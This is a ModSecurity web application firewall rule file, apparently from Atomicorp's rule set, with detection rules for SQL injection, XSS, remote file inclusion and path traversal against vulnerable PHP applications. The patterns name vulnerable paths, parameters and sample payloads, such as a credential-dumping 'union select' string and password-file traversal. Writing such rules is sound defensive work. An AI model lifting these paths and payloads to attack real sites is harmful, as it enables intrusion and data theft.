#SecRule REQUEST_URI "/view\.php\?l=.*&id=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310447,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Nuke modules.php cross-site-scripting attempt'"
# Rule 310449: AzDGDatingPlatinum view.php id Variable SQL Injection
#SecRule REQUEST_URI "/view.php\?l=.*&id=.*\'" # "id:310449,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AzDGDatingPlatinum view.php SQL injection attempt'"
# Rule 310450:PHPBB Remote Mod.PHP SQL Injection Vulnerability
SecRule REQUEST_URI "/moddb/mod\.php" "chain,id:310450,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB mod.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:id "\'"
# Rule 310451:CityPost PHP LNKX Input Validation Hole Permits Cross-Site
# Scripting Attacks
#SecRule REQUEST_URI "/lnkx/message\.php\?msg=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310451,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CityPost PHP LNKX message.php cross-site-scripting attempt'"
# Rule 310453:PHP-Nuke Blind SQL Injection
#SecRule REQUEST_URI "/modules\.php\?name=downloads&d_op=.*&title=.*&url=.*&description=.*&email=\'\,*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310453,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coppermine index.php cross-site-scripting attempt'"
# Rule 310454:PHP-Nuke Blind SQL Injection
#SecRule REQUEST_URI "/modules\.php\?name=downloads&d_op=.*&url=\'\,*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310454,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Nuke modules.php blind SQL injection attempt'"
# Rule 310455:PHP-Nuke Blind SQL Injection
#SecRule REQUEST_URI "/modules\.php\?name=downloads&d_op=viewsdownload&min=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select)[[:space:]]+[a-z|0-9|\*]+(?:from|into|table|database|index|view)" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310455,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Nuke modules.php blind SQL injection attempt'"
# Rule 310456:PHP-Nuke Blind SQL Injection
#SecRule REQUEST_URI "/modules\.php\?name=downloads&d_op=search&min=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310456,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Nuke modules.php blind SQL injection attempt'"
# Rule 310457:UBB Thread /ubbthreads/printthread.php SQL Injection Yes/No
# vulnerability
#SecRule REQUEST_URI "/printthread\.php*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310457,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: UBB Thread printthread.php SQL injection attempt'"
# Rule 310458:Coppermine remote file inclusion
SecRule REQUEST_URI "/theme\.php\?theme_dir=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310458,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coppermine theme.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310460:phpBB auction Mod SQL injection
#SecRule REQUEST_URI "/auction_rating\.php\?mode=.*&u=.*\'" # "id:310460,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB auction_rating.php SQL injection attempt'"
# Rule 310461:phpBB auction Mod SQL injection
#SecRule REQUEST_URI "/auction_offer\.php\?mode=.*&ar=.*\'" # "id:310461,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB auction_offer.php SQL injection attempt'"
# Rule 310462:kali's tagboard remote command execution
SecRule REQUEST_URI "/admin/banned\.php\?&cmd=" "id:310462,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kalis Tagboard banned.php local command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310463:PHPBB Profile.PHP Cross-Site Scripting Vulnerability
#SecRule REQUEST_URI "/profile\.php\?mode=viewprofile&u=.*(?:(?:script|script|about|applet|activex|chrome)\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310463,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB profile.php cross-site-scripting attempt'"
# Rule 310464:PHPBB Viewtopic.PHP Cross-Site Scripting Vulnerability
#SecRule REQUEST_URI "/viewtopic\.php\?p=.*&highlight=.*(?:(?:script|script|about|applet|activex|chrome)\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310464,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB viewtopic.php cross-site-scripting attempt'"
# Rule 310465:netref Remote Arbitrary File Creation Vulnerability
SecRule REQUEST_URI "script/cat_for_gen\.php" "id:310465,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: netref cat_for_gen.php local file creation attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310468: eGroupWare sitemgr-site/index.php category_id Variable XSS
#SecRule REQUEST_URI "/sitemgr/sitemgr-site/\?category_id=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310468,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eGroupWare sitemgr-site/index.php cross-site-scripting attempt'"
# Rule 310476:honeypot catch
SecRule REQUEST_URI "tiki-print\.php\?page=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki tiki-print.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310477: phpBB Notes Mod SQL Injection Vulnerability
SecRule REQUEST_URI "/posting_notes\.php\?mode=editpost\&*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310477,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB notes module posting_notes.php SQL injection attempt'"
# Rule 310479:phpCOIN SQL injection attacks
#SecRule REQUEST_URI "/login\.php\?w=.*&o=.*&phpcoinsessid=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)*\'" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310479,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpCOIN login.php SQL injection attempt'"
# Rule 310480:phpCOIN SQL injection attacks
SecRule REQUEST_URI "/mod\.php\?mod=siteinfo" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310480,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpCOIN mod.php SQL injection attempt'"
SecRule ARGS:id "(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)*\'&phpcoinsessid="
# Rule 310019:phpCOIN SQL injection attacks
SecRule REQUEST_URI "/mod\.php\?mod=pages&mode=list&(?:dcat_id|topic_id)=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)*\'\&phpcoinsessid=" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310481,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpCOIN mod.php SQL injection attempt'"
# Rule 310019: honeypot catch
#ideabox code injection
SecRule REQUEST_URI "/ideabox/include\.php" "id:310482,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ideabox remote include attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "(?:dir=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\?\&(?:cmd|id|inc|name)=)"
# Rule 310019: TorrentTrader SQL Injection
SecRule REQUEST_URI "/download\.php" "id:310491,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TorrentTrader SQL Injection',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SECRULE ARGS:id "\'"
# Rule 310019: honeypot XSS attack
#SecRule REQUEST_URI "/page\.php\?action=view&id=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310495,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic XSS attack'"
# Rule 310019: PArser XSS
#SecRule REQUEST_URI "/parser/parser\.php\?file=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310496,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Parser XSS attack'"
# Rule 310019: caught in honeypot
#SecRule REQUEST_URI "/check_user_id\.php\?user_id=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310497,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic XSS attack'"
# Rule 310019: JGS-Portal id Variable SQL Injection Vulnerability
SecRule REQUEST_URI "/jgs_portal\.php\?id=\'" "id:310499,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JGS-Portal id Variable SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310019: MyBulletinBoard SQL injection
SecRule ARGS:tid|ARGS:pid|ARGS:username|ARGS:sid|ARGS:uid|ARGS:fid "'" "capture,chain,id:390615,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MyBulletinBoard SQL injection',logdata:'%{TX.0}',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "/(?:new(?:reply|poll)|editpost|r(?:eputation|atethread)|usercp2|p(?:rintthread|ortal|olls)|showthread|forumdisplay)\.php"
# Rule 310019: MyBulletinBoard SQL injection
SecRule ARGS:usersearch "\%\'" "capture,chain,id:393615,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MyBulletinBoard SQL injection',logdata:'%{TX.0}',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "/memberlist\.php"
# Rule 310019: phpBB remote code execution vuln
# Rule 310019: downloadProtect "file" Disclosure of Sensitive Information
SecRule REQUEST_URI "/download\.php\?" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,id:314001,rev:1, severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: downloadProtect file Disclosure of Sensitive Information Inclusion Vulnerability'"
SecRule ARGS:file "\.\./"
# Rule 310019: phpSecurePages "cfgProgdir" File Inclusion Vulnerability
SecRule REQUEST_URI "phpSecurePages/secure\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:312119,rev:1, severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSecurePages cfgProgdir File Inclusion Vulnerability'"
SecRule ARGS:cfgProgdir "(?:\.\./|(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))"
# Rule 310019: PHPmyGallery "confdir" File Inclusion Vulnerability
SecRule REQUEST_URI "/common-tpl-vars\.php" "chain,id:310492,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPmyGallery confdir File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:confdir "(?:\.\./|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: Kayako LiveResponse SQL injection
SecRule REQUEST_URI|REQUEST_BODY "/index\.php\?" "chain,id:310493,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako LiveResponse SQL injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:date "(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |,]+[[:space:]](?:from|into|table|database|index|view)"
# Rule 310019: phpLDAPadmin welcome.php Arbitrary File Inclusion
SecRule REQUEST_URI "/welcome\.php\?custom_welcome_page=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380100,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpLDAPadmin welcome.php Arbitrary File Inclusion',logdata:'%{TX.0}'"
# Rule 310019: Simple PHP Blog comment_delete_cgi.php Arbitrary File Deletion
SecRule REQUEST_URI "/comment_delete_cgi\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380101,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Simple PHP Blog comment_delete_cgi.php Arbitrary File Deletion',logdata:'%{TX.0}'"
SecRule ARGS:comment "(?:/|\.\.|config/password\.txt)"
# Rule 310019: AutoLinks Pro "alpath" File Inclusion Vulnerability
SecRule REQUEST_URI "/al_initialize\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380102,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AutoLinks Pro File Inclusion Vulnerability',logdata:'%{TX.0}'"
SecRule ARGS:alpath "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310019: Simple PHP Blog Image File Upload Vulnerability
SecRule REQUEST_URI "/upload_img_cgi\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380103,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Simple PHP Blog Image File Upload Vulnerability ',logdata:'%{TX.0}'"
SecRule REQUEST_BODY|ARGS "\.php"
# Rule 310019: phpWebNotes Include File Error in 'php_api.php'
SecRule REQUEST_URI "/api\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380104,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhpWebNotes Include File Error in php_api.php:',logdata:'%{TX.0}'"
SecRule ARGS:t_path_core "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310019: FlatNuke "id" Local File Inclusion Vulnerability
#SecRule REQUEST_URI "/index\.php" chain
#SecRule ARGS:id "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310019: CMS Made Simple File Inclusion
SecRule REQUEST_URI "admin/lang\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380105,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CMS Made Simple File Inclusion',logdata:'%{TX.0}'"
SecRule REQUEST_URI "nls\[file\]\[vx\]\[vxsfx\]" chain
SecRule REQUEST_URI "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./)"
# Rule 310019: Phorum "username" Script Insertion Vulnerability
SecRule REQUEST_URI "register\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380106,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Phorum username Script Insertion Vulnerability',logdata:'%{TX.0}'"
SecRule ARGS:username "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310019: SimplePHPBplog vulns
SecRule REQUEST_URI "/comment_delete_cgi\.php" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380107,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SimplePHPBplog Vulnerability',logdata:'%{TX.0}'"
SecRule REQUEST_URI "(?:\.\.|/config/password\.txt)"
# Rule 310019: SimplePHPBplog vulns
SecRule REQUEST_URI "/images/(?:reset\.php|cmd\.php\?cmd=)" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380108,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SimplePHPBplog Vulnerability',logdata:'%{TX.0}'"
# Rule 310019: SimplePHPBplog vulns
#SecRule REQUEST_URI "/upload_img_cgi.php" # "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380109,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SimplePHPBplog Vulnerability',logdata:'%{TX.0}'"
#SecRule REQUEST_BODY "(?:content.*\.php|cmd\.php|reset\.php)"
# Rule 310019: SimplePHPBplog vulns
#SecRule REQUEST_URI "/install03_cgi\.php\?blog_language=english.*[a-z|0-9]" # "log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380110,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SimplePHPBplog Vulnerability',logdata:'%{TX.0}'"
# Rule 310019: aMember Pro "config['root_dir']" Remote File Inclusion Vulnerabilities
SecRule REQUEST_URI "(?:/db/mysql/mysql|payment|/efsnet/efsnet|theinternetcommerce/theinternetcommerce|/cdg/cdg|compuworld/compuworld|directone/directone|authorize_aim/authorize_aim|beanstream/beanstream|echo/config|/eprocessingnetwork/eprocessingnetwork|eway/eway|linkpoint/linkpoint|logiccommerce/logiccommerce|netbilling/netbilling|payflow_pro/payflow_pro|paymentsgateway/paymentsgateway|payos/payos|payready/payready|plugnplay/plugnplay)\.inc\.php\?config\[root_dir\]=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380111,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aMember Pro Remote File Inclusion Vulnerability',logdata:'%{TX.0}'"
# Rule 310019: CuteNews Input Validation Hole
SecRule REQUEST_URI "/cute/data/flood\.db\.php" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380112,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CuteNews Input Validation Vulnerability',logdata:'%{TX.0}'"
# Rule 310019: PBLang Local File Inclusion and PHP Code Injection
SecRule REQUEST_URI "/ucp\.php" "chain,id:380657,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible phpbb blind SQL injection attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "\""
# Rule 310019: phpMyFAQ vulns
SecRule REQUEST_URI "/index\.php" "chain,id:390657,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyFAQ path recusion attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:langcode "\.\."
# Rule 310019: AlstraSoft E-Friends "mode" File Inclusion Vulnerability
#SecRule REQUEST_URI "/index\.php" # "chain,id:390670,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AlstraSoft E-Friends mode File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
#SecRule ARGS:mode "(?:\.\.|/|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: SEO-Board SQL Injection Vulnerability
SecRule REQUEST_URI "/(?:admin|index)\.php" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390671,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SEO-Board SQL Injection Vulnerability'"
SecRule ARGS:user_pass_sha1 "(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]"
# Rule 310019: CJ LinkOut "123" Cross-Site Scripting Vulnerability
SecRule REQUEST_URI "/top\.php" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390672,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CJ LinkOut 123 Cross-Site Scripting Vulnerability'"
SecRule ARGS:123 "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310019: jPortal download search SQL Injection Vulnerability
SecRule REQUEST_URI "/download\.php" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390673,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: jPortal download search SQL Injection Vulnerability'"
SecRule ARGS:word "(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]"
# Rule 310019: CJ Tag Board Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "/details\.php" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390674,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CJ Tag Board Cross-Site Scripting Vulnerabilities'"
SecRule ARGS:date|ARGS:time|ARGS:name|ARGS:ip|ARGS:agent "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310019: CJ Tag Board Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "/details\.php" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390675,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CJ Tag Board Cross-Site Scripting Vulnerabilities'"
SecRule REQUEST_URI "/display\.php" chain
SecRule ARGS:msg "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310019: CJ Web2Mail Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "/thankyou\.php" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390676,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CJ Web2Mail Cross-Site Scripting Vulnerabilities'"
SecRule ARGS:message|ARGS:ip|ARGS:name "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310019: CJ Web2Mail Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "/web2mail\.php" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390677,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CJ Web2Mail Cross-Site Scripting Vulnerabilities'"
SecRule ARGS:emsg "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310019: postnuke Local file inclusion via GeSHi library
SecRule REQUEST_URI "/modules/pn_bbcode/pnincludes/contrib/example\.php" "id:390678,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: postnuke Local file inclusion via GeSHi library'"
# Rule 310019: PHP-Fusion "msg_send" SQL Injection Vulnerability
SecRule REQUEST_URI "/messages\.php" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390679,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP-Fusion msg_send SQL Injection Vulnerability '"
SecRule ARGS:msg_send "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union select user_password from fusion_users where user_name|\')"
# Rule 310019: SquirrelMail Address Add Plugin "first" Cross-Site Scripting
SecRule REQUEST_URI "/add\.php" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390680,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SquirrelMail Address Add Plugin first Cross-Site Scripting'"
SecRule ARGS:first "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310019: honeypot
SecRule REQUEST_URI "/tiki-view_forum_thread\.php" "chain,id:390681,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki forumid RFI injection attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:forumid "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
# Rule 310019: honeypot
SecRule REQUEST_URI "/index\.php\?page=\|" "id:390683,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: page argument metacharacter injection attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310019: Zomplog Cross-Site Scripting and SQL Injection Vulnerabilities
SecRule REQUEST_URI "detail\.php" "chain, id:320001,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Detail.php id SQL injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:id "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\')"
# Rule 310019: Zomplog Cross-Site Scripting and SQL Injection Vulnerabilities
#SecRule REQUEST_URI "/(?:get|index)\.php" #"chain, id:320002,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zomplog SQL injection'"
#SecRule ARGS:catid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,])"
# Rule 310019: Basic Analysis and Security Engine SQL Injection Vulnerability
#SecRule REQUEST_URI "/base_qry_main\.php\?new=.*&sig\[.*\]=\x3D&sig\[.*\]=(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\')" #"id:320003,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Basic Analysis and Security Engine SQL Injection Vulnerability'"
# Rule TClanPortal "id" SQL Injection Vulnerability
